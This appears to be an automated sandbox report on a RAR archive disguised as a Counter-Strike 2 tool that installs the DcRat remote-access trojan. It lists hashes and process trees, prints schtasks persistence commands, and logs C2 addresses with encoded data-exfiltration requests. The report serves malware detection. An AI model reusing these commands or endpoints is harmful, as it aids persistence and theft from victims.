File name:

CS2.rar

Full analysis: https://app.any.run/tasks/3c46f4ae-9c95-42dc-9ca3-bfb1d87a6d85
Verdict: Malicious activity
Threats:

A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices.

Analysis date: February 19, 2024, 18:27:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
rat
backdoor
dcrat
remote
stealer
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

288481F52BF788A8DECE265AF84D76B7

SHA1:

D425135B8E0FAA9948B50F8B2AB4812D121291AB

SHA256:

A3E5B1E6887D0A9886D3F28712AF38D3856EA3DCFCF31DDF2B7B7C937F72B612

SSDEEP:

24576:jSmCcAbAXa4y3AJrzdUb4f1ZlhBnc6tQIKbHm3MskLUuSGsZ8/R:jSmCc4AXahwpzdUb4f1ZlhBnc6tQIKTX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • MIDNIGHT CS2.exe (PID: 2044)
      • BrowserBroker.exe (PID: 1876)
    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 3736)
    • Actions looks like stealing of personal data

      • csrss.exe (PID: 2672)
    • DCRAT has been detected (SURICATA)

      • csrss.exe (PID: 2672)
    • Connects to the CnC server

      • csrss.exe (PID: 2672)
    • DCRAT has been detected (YARA)

      • csrss.exe (PID: 2672)
  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 2472)
      • MIDNIGHT CS2.exe (PID: 2044)
      • BrowserBroker.exe (PID: 1876)
    • Reads the Internet Settings

      • MIDNIGHT CS2.exe (PID: 2044)
      • wscript.exe (PID: 3736)
      • BrowserBroker.exe (PID: 1876)
      • csrss.exe (PID: 2672)
    • Executing commands from a ".bat" file

      • wscript.exe (PID: 3736)
    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 3736)
      • csrss.exe (PID: 2672)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 3736)
    • Executable content was dropped or overwritten

      • BrowserBroker.exe (PID: 1876)
      • MIDNIGHT CS2.exe (PID: 2044)
    • Executed via WMI

      • schtasks.exe (PID: 2648)
      • schtasks.exe (PID: 2572)
      • schtasks.exe (PID: 2232)
      • schtasks.exe (PID: 2692)
      • schtasks.exe (PID: 4004)
      • schtasks.exe (PID: 4044)
    • The process creates files with name similar to system file names

      • BrowserBroker.exe (PID: 1876)
    • Starts itself from another location

      • BrowserBroker.exe (PID: 1876)
    • Reads settings of System Certificates

      • csrss.exe (PID: 2672)
    • Starts application with an unusual extension

      • cmd.exe (PID: 3308)
  • INFO

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 2472)
    • Reads the computer name

      • MIDNIGHT CS2.exe (PID: 2044)
      • BrowserBroker.exe (PID: 1876)
      • csrss.exe (PID: 2672)
    • Drops the executable file immediately after the start

      • WinRAR.exe (PID: 2472)
    • Checks supported languages

      • MIDNIGHT CS2.exe (PID: 2044)
      • BrowserBroker.exe (PID: 1876)
      • csrss.exe (PID: 2672)
      • chcp.com (PID: 2564)
    • Reads the machine GUID from the registry

      • BrowserBroker.exe (PID: 1876)
      • csrss.exe (PID: 2672)
    • Reads product name

      • BrowserBroker.exe (PID: 1876)
      • csrss.exe (PID: 2672)
    • Reads Environment values

      • BrowserBroker.exe (PID: 1876)
      • csrss.exe (PID: 2672)
    • Reads the software policy settings

      • csrss.exe (PID: 2672)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

DcRat

(PID) Process(2672) csrss.exe
C2 (1)https://pastebin.com/raw/PXx6ZeVT
Options
MutexDCR_MUTEX-qNG6savcCCZ4gG8Ci2dM
searchpath%UsersFolder% - Fast
Targetals
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
52
Monitored processes
14
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe midnight cs2.exe wscript.exe no specs cmd.exe no specs browserbroker.exe schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs #DCRAT csrss.exe cmd.exe no specs chcp.com no specs

Process information

PID
CMD
Path
Indicators
Parent process
1876"C:\blockportinto\BrowserBroker.exe"C:\blockportinto\BrowserBroker.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Version:
5.15.2.0
Modules
Images
c:\blockportinto\browserbroker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
2044"C:\Users\admin\AppData\Local\Temp\Rar$EXb2472.24922\MIDNIGHT CS2.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXb2472.24922\MIDNIGHT CS2.exe
WinRAR.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\rar$exb2472.24922\midnight cs2.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24542_none_5c0717c7a00ddc6d\gdiplus.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2232schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\blockportinto\lsm.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
2472"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\CS2.rar"C:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
2564CHCP 437C:\Windows\System32\chcp.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Change CodePage Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\chcp.com
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2572schtasks.exe /create /tn "lsml" /sc MINUTE /mo 14 /tr "'C:\blockportinto\lsm.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
2648schtasks.exe /create /tn "lsml" /sc MINUTE /mo 7 /tr "'C:\blockportinto\lsm.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
2672"C:\MSOCache\All Users\csrss.exe" C:\MSOCache\All Users\csrss.exe
BrowserBroker.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Version:
5.15.2.0
Modules
Images
c:\msocache\all users\csrss.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
DcRat
(PID) Process(2672) csrss.exe
C2 (1)https://pastebin.com/raw/PXx6ZeVT
Options
MutexDCR_MUTEX-qNG6savcCCZ4gG8Ci2dM
searchpath%UsersFolder% - Fast
Targetals
2692schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\csrss.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
2964C:\Windows\system32\cmd.exe /c ""C:\blockportinto\9AJsWDUPB0I3aQGMRkcyJYs8Q.bat" "C:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
9 590
Read events
9 501
Write events
77
Delete events
12

Modification events

(PID) Process:(2472) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(2472) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(2472) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2472) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(2472) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(2472) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip
(PID) Process:(2472) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\CS2.rar
(PID) Process:(2472) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(2472) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(2472) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
Executable files
4
Suspicious files
1
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
2044MIDNIGHT CS2.exeC:\blockportinto\9AJsWDUPB0I3aQGMRkcyJYs8Q.battext
MD5:D33830E22073ACBCCF2D80975E0102FE
SHA256:91B531F73ECFE33A61ECB9378D8F57F2DA719BCB344B2D63FA26E1BD2600F97D
1876BrowserBroker.exeC:\blockportinto\101b941d020240text
MD5:A716AB9444542AC0A9F3D164653F9258
SHA256:
2044MIDNIGHT CS2.exeC:\blockportinto\qbnFBdoi7Bq5Dgp.vbevbe
MD5:2471F69FDCB3742EFF69DE6B3C36B3B3
SHA256:F5DC668946079678906F9AC2212C0535D22BCC0C7AA8F2CBB5C2D310C51581E3
2472WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb2472.24922\MIDNIGHT CS2.exeexecutable
MD5:1654B93A24715E4360B8513CE013F5C2
SHA256:93664D09D34041B0FEC98004C0EED5B41B4711EF074C15B2D34A0D6A20232A29
1876BrowserBroker.exeC:\blockportinto\lsm.exeexecutable
MD5:2FEBC59762070CC4022BBD00FE1F92BF
SHA256:8496E933E93B0392C2537A4F967BFE650F73E91EE24426F2E1E53BFD38FC95A5
1876BrowserBroker.exeC:\MSOCache\All Users\csrss.exeexecutable
MD5:2FEBC59762070CC4022BBD00FE1F92BF
SHA256:8496E933E93B0392C2537A4F967BFE650F73E91EE24426F2E1E53BFD38FC95A5
2044MIDNIGHT CS2.exeC:\blockportinto\BrowserBroker.exeexecutable
MD5:2FEBC59762070CC4022BBD00FE1F92BF
SHA256:8496E933E93B0392C2537A4F967BFE650F73E91EE24426F2E1E53BFD38FC95A5
1876BrowserBroker.exeC:\MSOCache\All Users\886983d96e3d3etext
MD5:AC9DB32A31715D5F9B9A26CE3F87888E
SHA256:B40EA4E0D61B7464AC2A8F31FEA55A7788A19CE4420570FED3D8E777AC822E17
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
126
TCP/UDP connections
10
DNS requests
3
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2672
csrss.exe
GET
200
145.14.144.105:80
http://hfriewofhewuiui342423.000webhostapp.com/L1nc0In.php?O7tIoYiqbFnt51n5fBkFKqKatcSA3=lCtk6Wi&hpI=nJxX7a7IztoythwSZLFiwQel&U4RXcd57YDBnVf2CvV1X51YjPnWkk8W=MXnfqvWPt0VevpDqMgB4m&2f4ad06a91d7d6618f46f514356d8066=85d3ab053e458f0cb3c5faff0e3018a6&da1fbc1cd5a69ef44588d7cba69f3912=QOkJGM0cTM0YGNwUjN1IDN1YGZ3QmMihDNkNjN3YTMjVGMhJjYwETY&O7tIoYiqbFnt51n5fBkFKqKatcSA3=lCtk6Wi&hpI=nJxX7a7IztoythwSZLFiwQel&U4RXcd57YDBnVf2CvV1X51YjPnWkk8W=MXnfqvWPt0VevpDqMgB4m
unknown
text
2.09 Kb
unknown
2672
csrss.exe
GET
200
145.14.144.105:80
http://hfriewofhewuiui342423.000webhostapp.com/L1nc0In.php?qbE=bG3RlDUvP&afe76f408e882d1360cb3c4f2a32c878=gYlJzMhNGOjBjY0MDZwMGMkR2NlZ2MyIzYwIWYmNTOyITOxMDN4ETO2YzM2ETMxcTMzYDNykTN&da1fbc1cd5a69ef44588d7cba69f3912=AMzQTOmJWZjZTO2EmZyEWZ2kjN5UTMwkDZmZTZxcjN4EWZjBjZzIGZ&ebe48df7063aaf50c194db1a0fb88c01=0VfiIiOiEmZhRmY5kzYyQWN3ITYwQ2MxMzN1EjYlVjZ0EWMiFGOiwiIlFGO2ATM3MTZ0EWYxY2MiVGN5YzNxUmNxUjYzgDM5UWZhVjZ5MjN2IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W
unknown
text
2.09 Kb
unknown
2672
csrss.exe
GET
200
145.14.144.105:80
http://hfriewofhewuiui342423.000webhostapp.com/L1nc0In.php?qbE=bG3RlDUvP&afe76f408e882d1360cb3c4f2a32c878=gYlJzMhNGOjBjY0MDZwMGMkR2NlZ2MyIzYwIWYmNTOyITOxMDN4ETO2YzM2ETMxcTMzYDNykTN&da1fbc1cd5a69ef44588d7cba69f3912=AMzQTOmJWZjZTO2EmZyEWZ2kjN5UTMwkDZmZTZxcjN4EWZjBjZzIGZ&32d366dd05d00cefa0aaf35a59181d5d=d1nIjdTZkhjMzMDOzIGOwIDM4IWMmRTYxQGO4ETZ4UzYhRGO4MTNlNjM2IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W&ebe48df7063aaf50c194db1a0fb88c01=QX9JiI6ISYmFGZilTOjJDZ1cjMhBDZzEzM3UTMiVWNmRTYxIWY4ICLiM2NlRGOyMzM4MjY4AjMwgjYxYGNhFDZ4gTMlhTNjFGZ4gzM1U2MyYjI6IyMkJTO2UDMzUGNygzYkZWYkZjMwUDO4QTZ4QTOwETO5ICLiYGOxMGM0EzNwY2YhZTZ2kDOhNmM2czY4gTYhhTYhJWO3czYjRmZyQmI6ISZhdTZhhTNzQGNiNGO1cDMjVmN3UDO2EDZkdDNlNjYyIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGaK5GT51UMRl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMlGNrlkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWS610Z3dVW1lzVhpnTYpVb502YRJUeOdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulUdsdkY5ZVbRZXVHNmdKhFZGpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplUN1cVW0pEWahkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeNBzZq5UdnRET0cGVNhHND1UMJl2Tp1kMiNnSDxUaVVkUp9maJVjSIRWdWNjYqp0QMlWVyMmeWd0Up9maJVXOXFmbW12YpdXaJVHbXllTCNlYoJ0QklnVuplc1cVW5p1aJZTSTVGMsJTWpdXaJFTUU1UdNRVT5RzQOlHNp5EeJpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmZhRmY5kzYyQWN3ITYwQ2MxMzN1EjYlVjZ0EWMiFGOiwiIyYTNlZWYwIzMhVTMiFTOygzN0QjNwMzM3QDNlZDO3cTYiZDZ3UDN0IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W
unknown
text
104 b
unknown
2672
csrss.exe
GET
200
145.14.144.105:80
http://hfriewofhewuiui342423.000webhostapp.com/L1nc0In.php?qbE=bG3RlDUvP&afe76f408e882d1360cb3c4f2a32c878=gYlJzMhNGOjBjY0MDZwMGMkR2NlZ2MyIzYwIWYmNTOyITOxMDN4ETO2YzM2ETMxcTMzYDNykTN&da1fbc1cd5a69ef44588d7cba69f3912=AMzQTOmJWZjZTO2EmZyEWZ2kjN5UTMwkDZmZTZxcjN4EWZjBjZzIGZ&58377049004914f1bec4d030d40c530b=QX9JSUmlWTuNGbOhlVnd3RiJEeGhFboJTWo5EMURVMFh1YwpXUp9maJ9mUYlVUKNETpRjMkZXNyEWdWxWS2k0QhBjRHV1aKNjYq5EWhVkSDxUaJl2Tpd2RkhmQWJGaKNjWsh3VaVlSDxUaJl2Tp1ESjdnRVJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTSDJlSKhlW6ZlVihmVHRGVKNETp10Mi5GbtN2aG12Ymh3VaBnSulFak1WS2kUajxmTYZFdGdlWw4EbJN3dHJWM102TpNWbihGeVJGaWdEZUp0QMlGMXlFbSNzY21EWaNHbtp1ZwcVW5RmMilnQzwkNN1WS2k0QhBjRHVFdGdlWw4EbJNXSTtkdsdkWxYURJNza6pERGVUSyZ1RkNnRXp1UoNUS1xWRJxWNXFWT1cEW5hXMiBnUXRmQClnT1MWeRJkQ5FGbShkYoZVbV9WQTpVd5cUY3lTbjpGbXRVavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiEmZhRmY5kzYyQWN3ITYwQ2MxMzN1EjYlVjZ0EWMiFGOiwiIlFGO2ATM3MTZ0EWYxY2MiVGN5YzNxUmNxUjYzgDM5UWZhVjZ5MjN2IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W
unknown
text
2.09 Kb
unknown
2672
csrss.exe
GET
200
145.14.144.105:80
http://hfriewofhewuiui342423.000webhostapp.com/L1nc0In.php?qbE=bG3RlDUvP&afe76f408e882d1360cb3c4f2a32c878=gYlJzMhNGOjBjY0MDZwMGMkR2NlZ2MyIzYwIWYmNTOyITOxMDN4ETO2YzM2ETMxcTMzYDNykTN&da1fbc1cd5a69ef44588d7cba69f3912=AMzQTOmJWZjZTO2EmZyEWZ2kjN5UTMwkDZmZTZxcjN4EWZjBjZzIGZ&32d366dd05d00cefa0aaf35a59181d5d=d1nIjdTZkhjMzMDOzIGOwIDM4IWMmRTYxQGO4ETZ4UzYhRGO4MTNlNjM2IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W&ebe48df7063aaf50c194db1a0fb88c01=QX9JiI6ISYmFGZilTOjJDZ1cjMhBDZzEzM3UTMiVWNmRTYxIWY4ICLiM2NlRGOyMzM4MjY4AjMwgjYxYGNhFDZ4gTMlhTNjFGZ4gzM1U2MyYjI6IyMkJTO2UDMzUGNygzYkZWYkZjMwUDO4QTZ4QTOwETO5ICLiYGOxMGM0EzNwY2YhZTZ2kDOhNmM2czY4gTYhhTYhJWO3czYjRmZyQmI6ISZhdTZhhTNzQGNiNGO1cDMjVmN3UDO2EDZkdDNlNjYyIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGaK5GT51UMRl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMlGNrlkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWS610Z3dVW1lzVhpnTYpVb502YRJUeOdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulUdsdkY5ZVbRZXVHNmdKhFZGpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplUN1cVW0pEWahkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeNBzZq5UdnRET0cGVNhHND1UMJl2Tp1kMiNnSDxUaVVkUp9maJVjSIRWdWNjYqp0QMlWVyMmeWd0Up9maJVXOXFmbW12YpdXaJVHbXllTCNlYoJ0QklnVuplc1cVW5p1aJZTSTVGMsJTWpdXaJFTUU1UdNRVT5RzQOlHNp5EeJpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmZhRmY5kzYyQWN3ITYwQ2MxMzN1EjYlVjZ0EWMiFGOiwiIyYTNlZWYwIzMhVTMiFTOygzN0QjNwMzM3QDNlZDO3cTYiZDZ3UDN0IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W
unknown
text
104 b
unknown
2672
csrss.exe
GET
200
145.14.144.105:80
http://hfriewofhewuiui342423.000webhostapp.com/L1nc0In.php?qbE=bG3RlDUvP&afe76f408e882d1360cb3c4f2a32c878=gYlJzMhNGOjBjY0MDZwMGMkR2NlZ2MyIzYwIWYmNTOyITOxMDN4ETO2YzM2ETMxcTMzYDNykTN&da1fbc1cd5a69ef44588d7cba69f3912=AMzQTOmJWZjZTO2EmZyEWZ2kjN5UTMwkDZmZTZxcjN4EWZjBjZzIGZ&32d366dd05d00cefa0aaf35a59181d5d=d1nIjdTZkhjMzMDOzIGOwIDM4IWMmRTYxQGO4ETZ4UzYhRGO4MTNlNjM2IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W&ebe48df7063aaf50c194db1a0fb88c01=QX9JiI6ISYmFGZilTOjJDZ1cjMhBDZzEzM3UTMiVWNmRTYxIWY4ICLiM2NlRGOyMzM4MjY4AjMwgjYxYGNhFDZ4gTMlhTNjFGZ4gzM1U2MyYjI6IyMkJTO2UDMzUGNygzYkZWYkZjMwUDO4QTZ4QTOwETO5ICLiYGOxMGM0EzNwY2YhZTZ2kDOhNmM2czY4gTYhhTYhJWO3czYjRmZyQmI6ISZhdTZhhTNzQGNiNGO1cDMjVmN3UDO2EDZkdDNlNjYyIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGaK5GT51UMRl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMlGNrlkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWS610Z3dVW1lzVhpnTYpVb502YRJUeOdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulUdsdkY5ZVbRZXVHNmdKhFZGpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplUN1cVW0pEWahkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeNBzZq5UdnRET0cGVNhHND1UMJl2Tp1kMiNnSDxUaVVkUp9maJVjSIRWdWNjYqp0QMlWVyMmeWd